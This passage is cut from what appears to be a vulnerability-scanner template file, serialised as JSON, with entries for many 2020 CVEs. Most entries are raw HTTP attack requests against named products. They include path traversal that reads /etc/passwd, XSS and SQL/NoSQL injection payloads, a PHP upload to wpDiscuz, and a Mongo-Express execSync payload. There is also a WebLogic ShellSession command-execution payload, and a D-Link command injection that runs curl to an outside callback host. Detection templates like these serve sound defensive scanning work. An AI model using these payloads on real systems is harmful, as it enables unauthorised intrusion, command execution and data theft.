boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1","{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35489","info":{"name":"WordPress Contact Form 7 - Unrestricted File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.3.2')"]},{"type":"word","part":"body","words":["Contact Form 7","== Changelog =="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-11798","info":{"name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/x-download","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: 